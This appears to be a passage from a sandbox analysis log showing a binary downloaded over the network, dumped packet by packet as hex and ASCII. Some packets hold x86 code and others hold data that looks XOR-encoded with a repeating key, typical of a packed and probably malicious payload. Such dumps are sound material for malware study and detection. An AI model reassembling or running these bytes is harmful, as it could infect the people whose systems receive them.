01 00 00 00 d9 45 ec d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 f8 69 41 00 d9 5d ec d9 05 fc 69 41 00 d9 5d ec d9 05 00 6a 41 Data Ascii: `E$AEEED$E$A<A<AUT$D$@UT$U$UEiA]E5E-E}uEUhiA]iA]iA]EEEtiA]iA]jA
2022-12-05 00:32:43 UTC	16	IN	Data Raw: 6a 41 00 d9 5d e0 d9 05 ec 6a 41 00 d9 5d e0 d9 05 f0 6a 41 00 d9 5d e0 d9 45 e0 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e0 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 f4 6a 41 00 d9 5d e0 d9 05 f8 6a 41 00 d9 5d e0 d9 05 fc 6a 41 00 d9 5d dc d9 05 00 6b 41 00 d9 5d dc d9 05 04 6b 41 00 d9 5d dc d9 45 dc d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 dc d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 08 6b 41 00 d9 5d dc d9 05 0c 6b 41 00 d9 5d dc d9 05 10 6b 41 00 d9 5d dc d9 45 dc d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 dc d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 14 6b 41 00 d9 5d dc d9 05 18 6b 41 00 d9 5d dc d9 05 1c 6b 41 00 d9 5d dc d9 45 dc d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 dc d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 Data Ascii: jA]jA]jA]EEEtjA]jA]jA]kA]kA]EEEtkA]kA]kA]EEEtkA]kA]kA]EEEt
2022-12-05 00:32:43 UTC	17	IN	Data Raw: 08 83 45 f4 01 83 45 f0 01 81 7d f0 a8 04 03 00 7e ef 81 7d f4 a9 04 03 00 0f 85 b1 00 00 00 c7 45 cc 00 00 00 00 c7 45 c8 00 00 00 00 c7 45 c4 13 08 59 00 d9 05 0c 6c 41 00 d9 5d c0 c7 45 bc 00 00 00 00 c7 44 24 04 7e 07 00 00 c7 04 24 20 70 40 00 e8 7a f3 ff ff 89 45 b0 89 55 b4 c7 44 24 0c 5b 00 00 00 c7 44 24 08 7e 07 00 00 c7 44 24 04 20 70 40 00 c7 04 24 44 60 41 00 e8 76 f2 ff ff e8 33 f5 ff ff 89 45 ac c7 44 24 0c 5b 00 00 00 c7 44 24 08 00 e6 00 00 c7 44 24 04 a0 77 40 00 c7 04 24 a0 60 41 00 e8 70 f1 ff ff 8b 45 ac 05 20 70 40 00 c7 44 24 08 a0 77 40 00 c7 44 24 04 00 00 00 00 c7 04 24 fc 60 41 00 ff d0 90 c9 c3 55 89 e5 83 e4 f0 83 ec 20 e8 5a 0b 00 00 a1 ec a0 41 00 ff d0 d9 05 10 6c 41 00 d9 5c 24 1c d9 05 14 6c 41 00 d9 5c 24 1c d9 05 18 6c Data Ascii: EE}~}EEEYlA]ED$~$ p@zEUD$[D$~D$ p@$D`Av3ED$[D$D$w@$`ApE p@D$w@D$$`AU ZAlA\$lA\$l
2022-12-05 00:32:43 UTC	18	IN	Data Raw: dd d8 0f 9a c0 ba 01 00 00 00 d9 44 24 10 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 14 d9 05 f4 6c 41 00 d9 5c 24 10 d9 05 f8 6c 41 00 d9 5c 24 10 d9 05 fc 6c 41 00 d9 5c 24 10 d9 44 24 10 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 44 24 10 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 14 d9 05 00 6d 41 00 d9 5c 24 10 d9 05 04 6d 41 00 d9 5c 24 10 d9 05 08 6d 41 00 d9 5c 24 10 d9 44 24 10 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 44 24 10 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 14 d9 05 0c 6d 41 00 d9 5c 24 10 d9 05 10 6d 41 00 d9 5c 24 10 d9 05 14 6d 41 00 d9 5c 24 10 d9 44 24 10 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 44 24 10 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 14 d9 05 18 6d 41 00 d9 5c 24 10 d9 05 1c 6d 41 00 d9 5c 24 10 d9 05 20 6d 41 00 d9 5c 24 0c d9 05 24 Data Ascii: D$EtlA\$lA\$lA\$D$D$EtmA\$mA\$mA\$D$D$EtmA\$mA\$mA\$D$D$EtmA\$mA\$ mA\$$
2022-12-05 00:32:43 UTC	20	IN	Data Raw: df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 04 24 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 04 6e 41 00 d9 1c 24 d9 05 08 6e 41 00 d9 1c 24 d9 05 0c 6e 41 00 d9 1c 24 d9 04 24 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 04 24 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 10 6e 41 00 d9 1c 24 d9 05 14 6e 41 00 d9 1c 24 d9 05 18 6e 41 00 d9 1c 24 d9 04 24 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 04 24 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 1c 6e 41 00 d9 1c 24 d9 05 20 6e 41 00 d9 1c 24 d9 05 24 6e 41 00 d9 1c 24 d9 04 24 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 04 24 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 28 6e 41 00 d9 1c 24 d9 05 2c 6e 41 00 d9 1c 24 e8 5b ea ff ff b8 00 00 00 00 c9 c3 90 90 66 90 66 90 66 90 66 90 a1 a0 5d 41 00 8b 00 Data Ascii: $EtnA$nA$nA$$$EtnA$nA$nA$$$EtnA$ nA$$nA$$$Et(nA$,nA$[ffff]A
2022-12-05 00:32:43 UTC	21	IN	Data Raw: 2d 0c 71 41 00 83 f8 07 7e aa 8b 15 0c 71 41 00 83 f8 0b 0f 8f a6 00 00 00 bf 0c 71 41 00 85 d2 0f 85 ee 01 00 00 8b 47 04 85 c0 0f 85 e3 01 00 00 8b 47 08 83 f8 01 0f 85 1c 02 00 00 83 c7 0c 81 ff 0c 71 41 00 0f 83 68 ff ff ff 8d 76 00 8b 07 8b 57 04 8d 88 00 00 40 00 8b 80 00 00 40 00 8d 9a 00 00 40 00 89 4d d4 89 45 d0 89 c1 8b 47 08 0f b6 f0 89 75 c8 83 fe 10 0f 84 8f 00 00 00 83 fe 20 75 6a 8b 75 d0 2b 75 d4 03 33 a8 e0 0f 85 6a 01 00 00 85 f6 0f 88 62 01 00 00 8b 45 d0 89 74 24 10 89 5c 24 08 89 44 24 0c 8b 45 c8 c7 04 24 78 70 41 00 89 44 24 04 e8 20 fd ff ff 85 d2 0f 85 48 01 00 00 a1 10 71 41 00 89 c1 0b 0d 14 71 41 00 0f 85 75 01 00 00 8b 15 18 71 41 00 bf 18 71 41 00 e9 34 ff ff ff 90 8d 74 26 00 83 fe 08 0f 84 c7 00 00 00 8b 45 c8 c7 04 24 4c Data Ascii: -qA~qAqAGGqAhvW@@@MEGu uju+u3jbEt$\$D$E$xpAD$ HqAqAuqAqA4t&E$L
2022-12-05 00:32:43 UTC	22	IN	Data Raw: 41 00 ff 15 08 a1 41 00 89 f0 83 ec 04 83 c4 14 5b 5e c3 be ff ff ff ff eb 8c 8d b6 00 00 00 00 8d bf 00 00 00 00 53 83 ec 18 a1 7c 90 41 00 8b 5c 24 20 85 c0 75 0f 83 c4 18 31 c0 5b c3 90 8d b4 26 00 00 00 00 c7 04 24 80 90 41 00 ff 15 e8 a0 41 00 8b 15 78 90 41 00 83 ec 04 85 d2 74 17 8b 02 39 c3 75 0a eb 3e 8b 08 39 d9 74 28 89 c2 8b 42 08 85 c0 75 f1 c7 04 24 80 90 41 00 ff 15 08 a1 41 00 31 c0 83 ec 04 83 c4 18 5b c3 90 8d b4 26 00 00 00 00 8b 48 08 89 4a 08 89 04 24 e8 82 05 00 00 eb d1 8b 42 08 a3 78 90 41 00 89 d0 eb ea 8d 74 26 00 53 83 ec 18 8b 44 24 24 83 f8 01 0f 84 9f 00 00 00 85 c0 74 3b 83 f8 02 74 26 83 f8 03 75 0d a1 7c 90 41 00 85 c0 0f 85 b4 00 00 00 83 c4 18 b8 01 00 00 00 5b c3 8d 76 00 8d bc 27 00 00 00 00 e8 7b f7 ff ff 83 c4 18 b8 Data Ascii: AA[^S\|A\$ u1[&$AAxAt9u>9t(Bu$AA1[&HJ$BxAt&SD$$t;t&u\|A[v'{
2022-12-05 00:32:43 UTC	24	IN	Data Raw: 00 10 00 00 8d 4c 24 0c 72 15 81 e9 00 10 00 00 83 09 00 2d 00 10 00 00 3d 00 10 00 00 77 eb 29 c1 83 09 00 58 59 c3 90 90 66 90 66 90 a1 ac 90 41 00 c3 8d 76 00 8d bc 27 00 00 00 00 8b 44 24 04 87 05 ac 90 41 00 c3 90 90 90 90 90 8b 44 24 04 c1 e0 05 03 05 50 a1 41 00 c3 90 90 ff 25 28 a1 41 00 90 90 ff 25 30 a1 41 00 90 90 ff 25 34 a1 41 00 90 90 ff 25 38 a1 41 00 90 90 ff 25 3c a1 41 00 90 90 ff 25 40 a1 41 00 90 90 ff 25 44 a1 41 00 90 90 ff 25 48 a1 41 00 90 90 ff 25 4c a1 41 00 90 90 ff 25 54 a1 41 00 90 90 ff 25 58 a1 41 00 90 90 ff 25 5c a1 41 00 90 90 ff 25 60 a1 41 00 90 90 ff 25 64 a1 41 00 90 90 ff 25 68 a1 41 00 90 90 ff 25 6c a1 41 00 90 90 ff 25 70 a1 41 00 90 90 ff 25 74 a1 41 00 90 90 ff 25 78 a1 41 00 90 90 ff 25 7c a1 41 00 90 90 ff 25 Data Ascii: L$r-=w)XYffAv'D$AD$PA%(A%0A%4A%8A%<A%@A%DA%HA%LA%TA%XA%\A%`A%dA%hA%lA%pA%tA%xA%\|A%
2022-12-05 00:32:43 UTC	25	IN	Data Raw: b7 86 c8 f9 03 8d fb b7 4d ad 9c 86 c7 14 b3 e1 f2 51 a6 b3 af 4a ba e9 a0 b0 e2 81 40 8f cc b7 fa c9 76 cd f6 7d 7d ae 02 8b a4 b6 ae ac e3 fb c0 b5 b2 af 86 f3 63 d5 8f 59 b0 80 73 33 48 3f b4 8a 49 4d a6 01 ad 12 ea fc 2e ae ac 97 fa 30 bd 26 40 29 85 37 88 25 12 b9 ed d8 cd b7 86 67 8b 13 e9 1a fe 6f 52 63 f4 cf 8d a8 97 88 b2 dc e4 ae 86 85 26 50 4f 56 64 97 25 eb c3 34 27 47 94 f6 f7 ee 96 ad 9c 7e 4a 50 53 e3 8d fe 28 70 53 88 75 d5 16 5b df 61 94 f9 66 84 f0 72 bc 7f a7 d2 32 6d 52 17 6f 73 c7 f7 68 77 75 2d 42 a6 3f 6c 63 25 47 65 ef 2b f9 6e b0 92 32 ff 9c b8 27 ca 5e 92 ea 2c 9e 37 6a 79 78 e1 99 71 1d 23 7a 62 5f cb 19 37 68 70 00 88 40 21 7b d2 f1 4f 62 28 52 63 76 ce 6c 50 68 77 46 99 2a 69 2f 7e 6d c4 8f 6b 78 69 70 33 47 fd 1e 77 46 31 ff Data Ascii: MQJ@v}}cYs3H?IM.0&@)7%goRc&POVd%4'G~JPS(pSu[afr2mRoshwu-B?lc%Ge+n2'^,7jyxq#zb_7hp@!{Ob(RcvlPhwF*i/~mkxip3GwF1
2022-12-05 00:32:43 UTC	26	IN	Data Raw: 60 34 6b 32 42 75 46 6a 38 4c c2 63 41 42 78 67 22 37 50 4f 39 77 68 65 5d 69 65 77 4e 4a 44 68 57 58 6a 7a 66 33 37 4b 69 36 4d 5c b9 70 38 52 71 48 51 47 44 30 70 46 64 34 6b 32 42 75 46 68 38 4c 43 63 41 52 78 67 32 37 50 4f 39 67 68 65 4d 69 65 b7 b8 4a 44 40 57 58 6a 7a 66 33 37 4b 69 36 4d 58 41 70 38 6e 71 48 51 47 44 30 70 46 64 34 6b 32 42 75 46 68 38 4c 43 63 41 52 78 67 32 37 50 4f e9 67 68 45 4d 69 65 77 4e 4a 44 78 57 58 6a 7a 66 33 37 4b 69 36 4d 58 41 70 38 6e 71 48 51 69 30 55 08 32 64 34 6b 39 f6 75 46 68 28 4c 43 63 f7 52 78 67 36 37 50 4f 39 67 68 65 4d 69 65 77 4e 4a 44 58 57 58 0a 54 14 57 56 3f 08 36 4d 8a 69 70 38 6e a1 48 51 47 6e 30 70 46 de 34 6b 32 42 75 46 68 38 4c 43 63 41 52 78 27 32 37 10 61 5d 06 1c 04 4d 69 65 cf 4b 4a 44 Data Ascii: `4k2BuFj8LcABxg"7PO9whe]iewNJDhWXjzf37Ki6M\p8RqHQGD0pFd4k2BuFh8LCcARxg27PO9gheMieJD@WXjzf37Ki6MXAp8nqHQGD0pFd4k2BuFh8LCcARxg27POghEMiewNJDxWXjzf37Ki6MXAp8nqHQi0U2d4k9uFh(LCcRxg67PO9gheMiewNJDXWXTWV?6Mip8nHQGn0pF4k2BuFh8LCcARx'27a]MieKJD
2022-12-05 00:32:43 UTC	28	IN	Data Raw: 29 65 9f 71 d6 44 78 0e 08 3c 85 b5 59 24 f1 e9 e5 0d 58 e2 10 39 2f 71 f1 c5 94 04 30 98 62 f8 34 6b 6b 12 23 b9 bb 52 47 f9 cb 92 12 78 c4 ee 37 11 4f 80 db bb 25 4d 81 6c eb 4e 4a 1d 28 01 a7 b9 10 77 89 ff 98 29 36 ee d4 41 31 38 d7 ad 9b 11 47 ac de eb 46 64 6d 3b 64 bd a6 2c 63 82 bc 90 23 41 f1 38 67 73 37 e9 4b ed 27 68 8d 9e f2 65 77 17 1a 12 87 84 32 66 c0 76 e7 77 4b ca 12 4d 19 41 c9 1c ba 31 48 b9 ff df 30 70 1f 34 62 94 e1 28 6d fc 5c ec 0c 43 c0 bd 52 39 67 8b 7f 84 0f 39 8f f5 fe 4d 69 3c 27 18 b5 97 12 59 e2 0e ae 26 33 94 4f 68 77 4d e1 39 a4 78 6e 99 ca ca 47 44 69 20 10 9b e7 01 26 f8 fd 92 28 38 ef e3 63 00 52 c1 fb e6 77 50 a7 5e fc 68 65 14 39 33 88 9d 20 49 c2 e3 8c 2a 7a c5 1f 37 0a 69 8f 85 8c 01 70 d0 22 ea 48 51 1e 14 66 8f 95 Data Ascii: )eqDx<Y$X9/q0b4kk#RGx7O%MlNJ(w)6A18GFdm;d,c#A8gs7K'hew2fvwKMA1H0p4b(m\CR9g9Mi<'Y&3OhwM9xnGDi &(8cRwP^he93 I*z7ip"HQf
2022-12-05 00:32:43 UTC	29	IN	Data Raw: 44 47 94 70 70 2c 6a 8e c3 e8 02 75 e5 60 39 0d 43 da fd 88 38 67 da e5 c6 4f 39 3e 38 33 b2 7c 65 a7 0e 4a 2e 6b ed 94 b0 3a 66 8a d7 91 29 36 a5 e0 d7 70 38 37 21 1e ae 52 44 e0 30 46 0e 24 d1 c6 98 35 46 cb 5c 4c 02 63 f8 5a a3 27 32 df c9 d9 39 67 31 35 1b 96 70 77 9e 0a 44 12 45 e2 76 a1 26 33 94 3f 68 77 4d e1 71 ab 78 6e 99 32 c7 47 44 69 20 10 9b 21 6b e2 02 75 2c 65 82 08 98 23 41 f1 10 66 73 37 e9 17 e2 27 68 8d 16 ff 65 77 17 1a 12 87 42 58 ba 3a 66 59 27 f1 01 ed 0d 58 e2 6c 39 2f 71 f1 2d 9c 04 30 98 7a f2 34 6b 6b 12 23 b9 7d 38 9c 03 63 2b 42 c2 f7 e9 77 50 ec 29 67 29 65 f4 cd be 37 4e a2 59 ee 57 58 33 2a 30 cc 22 4b b9 76 4d 32 51 ca 80 b5 31 48 f2 b3 44 71 70 ff a8 ef 2b 32 aa 8b d3 68 38 15 13 35 ca 67 78 b7 72 37 af 99 53 6a d2 85 96 Data Ascii: DGpp,ju`9C8gO9>83\|eJ.k:f)6p87!RD0F$5F\LcZ'29g15pwDEv&3?hwMqxn2GDi !ku,e#Afs7'hewBX:fY'Xl9/q-0z4kk#}8c+BwP)g)e7NYWX3*0"KvM2Q1HDqp+2h85gxr7Sj
2022-12-05 00:32:43 UTC	30	IN	Data Raw: c2 77 99 67 20 83 5a b7 29 28 c3 55 25 95 54 6a 2f ed df 66 18 3f 61 c4 15 bd fb c2 e5 3c 44 3b 42 1a bd 29 43 5f ea 1d 21 c9 62 cd 25 c4 c6 47 6d 07 da 7a 25 09 c4 22 ba b2 2a 64 ee 4a 36 3b 2c 88 0e 4c 79 57 6b aa b3 a5 66 bc a7 e8 da 25 5c 41 70 bb 13 61 4a 02 11 cf c2 27 cf 11 cc e0 cb 4d fa 87 68 38 4c 12 34 10 e9 7c 66 32 37 dd c2 a5 9c 97 9a c6 ba 8d 3e b1 b5 bb 87 62 90 6b 3b 66 b8 e4 c6 e4 aa b6 a7 be 98 e1 90 8e b7 dc c2 e0 cd 8f b9 34 b9 ee ae b9 8a b9 38 c7 59 5b 63 00 52 f3 bf b1 cc af 3a 3d 55 a8 8e 31 9f e0 d3 b3 b5 bb 68 23 00 95 4f be 32 76 4b e4 b3 9d a5 be 8f 68 91 64 d0 51 06 44 b5 b0 33 05 5c 63 30 42 75 2c 28 c7 59 07 63 00 52 f3 97 bf b2 80 b2 c6 98 38 32 1b 96 70 77 4e 0b 44 12 57 a7 1f 76 ed 66 cf c0 a7 c9 38 50 a9 b6 3b 6e 71 cb Data Ascii: wg Z)(U%Tj/f?a<D;B)C_!b%Gmz%"*dJ6;,LyWkf%\ApaJ'Mh8L4\|f27>bk;f48Y[cR:=U1h#O2vKhdQD3\c0Bu,(YcR82pwNDWvf8P;nq
2022-12-05 00:32:43 UTC	31	IN	Data Raw: 99 46 23 b4 5f c9 58 6c 40 31 38 91 04 5c d8 41 bb 25 b0 46 25 34 94 47 b2 1f 06 97 2d 08 43 22 41 db 3d 73 bf 72 44 1f 68 ec a7 8d a4 fb 65 77 c5 5f 58 7a 16 58 e1 b2 8e 36 b8 4b 69 bd 30 4c 18 29 bd 91 05 5d da 32 54 67 8f 70 9b 21 5f 33 03 75 11 e1 3e b3 56 a3 41 13 78 ec 4f db 63 94 b2 12 94 26 b2 1c 9d 88 5b fe 44 39 57 0e 95 6f a6 33 76 4b 96 43 a5 a7 54 b0 38 2f 71 1f ae 52 84 30 31 46 3b 6a e1 f1 19 bc 85 3d b3 a0 c2 8f b9 50 78 67 61 61 63 8f b0 32 fc 32 c4 2c cd cc 46 48 44 78 f6 50 68 3b 66 b8 c6 18 e0 73 d1 f9 a5 71 79 6e 1b 08 d8 32 dc b9 35 d6 9b 21 2f 32 03 75 15 e3 c0 26 03 ea 3c 8a 87 72 76 37 11 4f 51 67 6c 65 4d e2 bd 1d 0e c3 19 d4 a8 4d 2e 7a 27 33 5f 4b 68 36 4d 32 01 f9 7d d6 8e 5d 15 47 05 30 f3 3b 74 34 e2 77 ae 00 56 97 4d d0 15 Data Ascii: F#_Xl@18\A%F%4G-C"A=srDhew_XzX6Ki0L)]2Tgp!_3u>VAxOc&[D9Wo3vKCT8/qR01F;j=Pxgaac22,FHDxPh;fsqyn25!/2u&<rv7OQgleMM.z'3_Kh6M2}]G0;t4wVM
2022-12-05 00:32:43 UTC	33	IN	Data Raw: 00 b6 97 2d 8c 43 22 41 ad 0d 83 cd 22 90 4f 78 67 97 10 ed 96 70 b7 4e 0b 44 f3 12 ac ef ba 12 34 67 b4 7c f6 4d 19 41 f3 75 be 8e 20 51 43 44 30 1a 06 9b 21 2f 32 03 75 2e e8 38 4c 43 09 01 db 3d 93 cd 22 14 4f 78 67 e3 95 c6 2c b5 fe 3b ee c7 80 a8 2d 7b 85 13 af 61 b4 7c 02 4c 19 41 fb c8 e7 04 ec ba 49 14 cf 05 d6 32 cb 7e d6 42 34 46 eb fc 40 15 9c 34 ca 2f 98 27 37 50 0e 39 ea ed 69 b0 96 9a 27 19 b5 51 60 57 19 6a f9 9e cc 38 cf 1f 32 4d 58 29 70 38 4e 71 22 11 1c 17 cf 65 02 64 75 6b 5a 42 75 66 68 6b c5 06 83 be 47 3c 67 73 37 38 4f 39 e7 68 36 c4 2c 81 88 5b 0e 44 39 57 30 6a 7a 26 33 64 c2 2c ea b2 4d 05 70 79 6e 8e 0d f9 c4 21 c8 70 c5 01 e0 6b 5a 42 71 46 68 6b c5 06 d7 be 47 3c 67 73 37 38 4f 29 67 68 36 c4 2c 8d 88 5b 0e 44 39 57 a7 1f 6a Data Ascii: -C"A"OxgpND4g\|MAu QCD0!/2u.8LC="Oxg,;-{a\|LAI2~B4F@4/'7P9i'Q`Wj82MX)p8Nq"edukZBufhkG<gs78O9h6,[D9W0jz&3d,Mpyn!pkZBqFhkG<gs78O)gh6,[D9Wj
2022-12-05 00:32:43 UTC	34	IN	Data Raw: 8d bb 02 d3 86 f9 8a 67 64 1d 3e 5e 4d 5c 41 70 52 2e fa 92 d8 0a 90 cf 65 02 64 75 6b cd 37 65 16 97 2d 78 42 22 41 d1 1d 9b 32 ba 05 b3 b2 9f e5 20 81 39 ee b8 a6 ff ab 87 a8 9f 6e 5e 66 31 37 4b 03 76 b2 4d 05 70 79 6e 8e 3d 9d cc b4 bd 25 96 35 bf 26 ce cb 00 96 80 ff bc bc 9c c2 37 90 67 6b 6e 38 4f 3d 67 68 0f 0d e0 10 bf 89 0f 80 78 55 58 6a 85 73 77 37 0a 69 b5 30 a4 41 fb c8 e7 04 a4 25 4e bb 45 8c b9 71 f4 6b 73 42 f8 03 d4 68 7f 83 33 11 02 28 ea 77 df 00 c2 7c a3 38 9a 58 c1 65 36 4e cf 84 0c 76 a7 1f c6 ed 7e f7 c6 3c da a5 99 af 8f c7 e5 04 a4 08 c2 84 44 7b 10 9b 07 94 27 76 74 07 68 b1 4f c0 1e a9 52 0c 6e cd 42 b8 b0 2c a7 68 24 4d ea 18 bf 4e 3e 4d 87 22 90 95 6f a6 33 76 4b ea 4b 8d 58 35 79 c7 1b b1 b7 44 87 44 71 70 c3 92 40 6c 64 bd Data Ascii: gd>^M\ApR.eduk7e-xB"A2 9n^f17KvMpyn=%5&7gkn8O=ghxUXjsw7i0A%NEqksBh3(w\|8Xe6Nv~<D{'vthORnB,h$MN>M"o3vKKX5yDDqp@ld
2022-12-05 00:32:43 UTC	35	IN	Data Raw: cb 21 84 3b cd 57 dd 46 29 38 c9 83 17 63 ad 0d cf b9 7a fc c2 6c 8b 80 60 a7 96 9a fc 3b a6 1d fd 97 2c 66 f1 23 ff 61 b4 59 c9 58 6c 40 31 38 eb 87 3c 56 11 bb 25 b0 46 25 34 e8 4f f6 75 32 61 c7 39 f7 9c 54 92 78 26 32 b4 2d a7 39 13 61 9a 38 81 9a 62 8e 4a 05 78 d4 25 c6 7a 12 3a c8 3e c5 c9 58 98 41 31 38 eb aa 3c 56 14 bb 25 b0 46 25 34 03 3a 40 75 46 02 78 b3 56 27 41 13 78 ec 3f 23 52 0e 39 ec b0 ee 38 7d 56 b7 c7 07 dc f3 5a b4 6b 3b 66 ba 7a d7 e0 73 85 a7 35 f5 a0 91 04 44 02 b8 51 30 70 07 64 bf b3 bb 1f cd c3 9e 37 c8 51 62 41 52 87 52 8a 36 11 4f 6f 98 7d a9 4d 28 65 88 7b 46 46 39 57 fb da 7f 27 33 61 b4 7c fa 4d 19 41 8f 0d 4a 73 09 51 e4 e0 35 31 46 32 cb 7e fe 42 34 46 97 0d 14 41 22 41 f1 d8 62 73 37 06 b0 2c ab 68 24 4d 96 50 ab 4f 0b Data Ascii: !;WF)8czl`;,f#aYXl@18<V%F%4Ou2a9Tx&2-9a8bJx%z:>XA18<V%F%4:@uFxV'Ax?#R98}VZk;fzs5DQ0pd7QbARR6Oo}M(e{FF9W'3a\|MAJsQ51F2~B4FA"Abs7,h$MPO
2022-12-05 00:32:43 UTC	37	IN	Data Raw: 38 d1 ee 3a f2 c7 11 94 bf e3 8e 85 99 b8 42 a7 30 b3 8d 2c 4a 26 c7 5d 8e 5d 65 46 05 30 f9 45 e7 49 83 32 36 7c b9 1d d0 b3 56 a3 41 13 78 e4 4f f3 50 3b 30 98 1d a1 b2 7c a5 77 0f 4a c7 05 eb 58 1e 73 99 46 8b b4 7c f6 4d 19 41 f5 ce 1a 76 1e ae 52 84 30 31 46 e1 cb 1f 35 15 8a 53 a8 38 0d 43 e8 34 46 fd 91 3d b3 9c 4c 39 67 97 50 f5 68 24 77 18 b5 51 b4 57 19 6a 85 53 3f 35 0a 69 95 fd 5d 00 70 6e 91 64 84 51 06 44 cf 45 9a 65 75 6b 91 e6 70 07 68 6e b3 56 af 41 13 78 98 07 13 52 0e 39 c4 f0 60 0c 69 33 88 5b 86 44 39 57 a7 5f 22 64 72 37 e8 c9 33 0c 58 17 8f 2d a2 71 09 51 b8 71 84 71 07 64 97 c3 37 03 75 10 97 2d 80 43 22 41 ad 4d 23 30 76 50 ec ad 62 29 65 1b 96 70 bb 4e 0b 44 87 62 fc 6b 3b 66 90 ab 4e 28 36 1b a7 54 bc 38 2f 71 f7 59 45 44 30 d3 Data Ascii: 8:B0,J&]]eF0EI26\|VAxOP;0\|wJXsF\|MAvR01F5S8C4F=L9gPh$wQWjS?5i]pndQDEeukphnVAxR9`i3[D9W_"dr73X-qQqqd7u-C"AM#0vPb)epNDbk;fN(6T8/qYED0
2022-12-05 00:32:43 UTC	38	IN	Data Raw: 47 d5 79 45 30 70 cb 21 c8 3b 61 bd 60 e2 6d 79 4c 1a 3a c4 92 0c 6f 58 c9 0f a6 11 66 68 65 ce 14 99 77 3b 4e 2e 85 bc a8 00 7a eb 76 3b 1b 03 c9 b2 6d a9 71 79 6e 8e 3d ad b8 51 80 75 07 64 b7 af 26 bd 00 4a ed f8 38 56 9c 54 ca 7d 26 32 c8 25 b3 c6 72 c8 60 0c 69 3c 2e 24 b6 af c2 a8 4d c2 7f 27 33 6e c8 91 52 42 dd f5 70 38 6e fa 15 a1 2d 44 cf 05 4a 9b 21 f7 37 03 75 11 97 4d 40 c8 93 be 47 e4 62 73 37 d3 8b 29 5c 9f 19 30 52 a2 0b 37 20 44 87 22 54 95 6f f2 36 76 4b 3e c9 38 54 ca 80 c7 7b e5 4d 10 47 c7 f4 60 cf 21 c4 3d cd 57 f1 46 29 38 77 84 1d 10 d9 73 ec e4 df 85 38 39 67 e3 70 01 6b 24 77 c5 82 cd 7b bf 9e 1d 7a 66 b8 42 bb 3f bf 4e a7 54 f4 38 2f 71 73 96 39 6d bb 7b cd b2 dc c6 45 42 75 cd 7d 74 4e 02 63 ca 9a f1 64 da a9 27 4f 39 ec 7d 29 Data Ascii: GyE0p!;a`myL:oXfhew;N.zv;mqyn=Qud&J8VT}&2%r`i<.$M'3nRBp8n-DJ!7uM@Gbs7)\0R7 D"To6vK>8T{MG`!=WF)8ws89gpk$w{zfB?NT8/qs9m{EBu}tNcd'O9})
2022-12-05 00:32:43 UTC	39	IN	Data Raw: 50 c4 6c 6b e3 ad a5 5f 16 77 4e c1 51 d4 56 19 6a f1 ae db 1e 38 69 36 c0 cd e5 8d c7 91 fa 80 b9 5b 37 30 70 11 33 63 3c 58 bd 25 11 00 d1 b1 43 63 c8 17 80 98 27 eb 50 0e 39 ee 2d 8d c0 21 25 26 24 0a bb 6d 13 58 2b 7a 0e 39 35 4b 69 5c 0d d3 b9 8f 2d 2a 71 09 51 ce 01 cc fb 03 8c b1 ab 46 17 46 8f 39 69 1c 14 09 be ad 0d 9f 63 5f b9 b2 39 67 97 70 91 69 24 77 cb 8a 4b fc de 58 6a 7a ed 76 d3 18 96 43 b1 d1 3c bc b1 2b a1 b7 44 73 45 71 70 cd 29 20 e6 47 8e f6 23 b0 38 c5 06 b7 ca 53 f3 9f f3 d0 54 4c 44 77 28 ec 4c cc c0 d2 eb c1 31 98 bc 48 3d 85 73 f3 37 0a 69 c9 38 a4 be 65 f8 6e 30 48 02 b8 51 f0 70 07 64 62 94 27 82 75 07 68 b3 11 b7 50 be d9 0d bb bf b2 28 b2 c6 98 38 36 b2 7c 25 76 0f 4a c1 b8 58 dd 79 84 99 cc 64 b4 7c 46 4d 19 41 8f 4d 9e 8e Data Ascii: Plk_wNQVj8i6[70p3c<X%Cc'P9-!%&$mX+z95Ki\-*qQFF9ic_9gpi$wKXjzvC<+DsEqp) G#8STLDw(L1H=s7i8en0HQpdb'uhP(86\|%vJXyd\|FMAM
2022-12-05 00:32:43 UTC	41	IN	Data Raw: 1c 41 31 38 91 04 a4 ae 32 54 60 8f 53 64 34 2a 32 11 fe b6 02 78 c5 36 9b be 47 3c 67 73 37 db 99 b2 af 80 a5 20 69 65 fc 5b 82 45 39 57 d3 a2 92 d5 5e 37 4b e4 bb c9 a5 be 8f b1 2b ad 19 01 b8 51 28 70 07 64 bf b3 bb 1f 95 c5 93 c7 43 c7 56 40 52 78 91 b7 b3 ad b0 c6 77 67 e1 f1 69 65 77 28 c9 f9 c8 aa a7 95 54 69 b7 99 4b 69 36 b2 2d b5 fd bd de 8c b7 ae 17 bb 25 f0 47 25 34 ee f2 4d f1 d0 68 38 4c 2b 69 43 52 78 0d 72 c8 45 0b 39 26 68 9a 38 79 35 88 5b 7e 45 39 57 32 36 f1 96 59 37 1d e0 43 a5 a7 54 a8 38 2f 71 22 0d ca 1c 32 43 86 ef ff 40 fc 93 8c 16 3e 5e c5 07 2d ab ad 6d bf 32 76 50 27 31 65 68 65 27 29 e8 0f 4c b5 51 3c 57 19 6a f1 13 cb bc 83 e2 e0 a5 5c 2c 70 38 e3 fc f8 ac b8 bb 61 26 16 9b 21 6b 32 03 75 b9 1d 30 c7 16 93 ca a2 87 12 d6 bc Data Ascii: 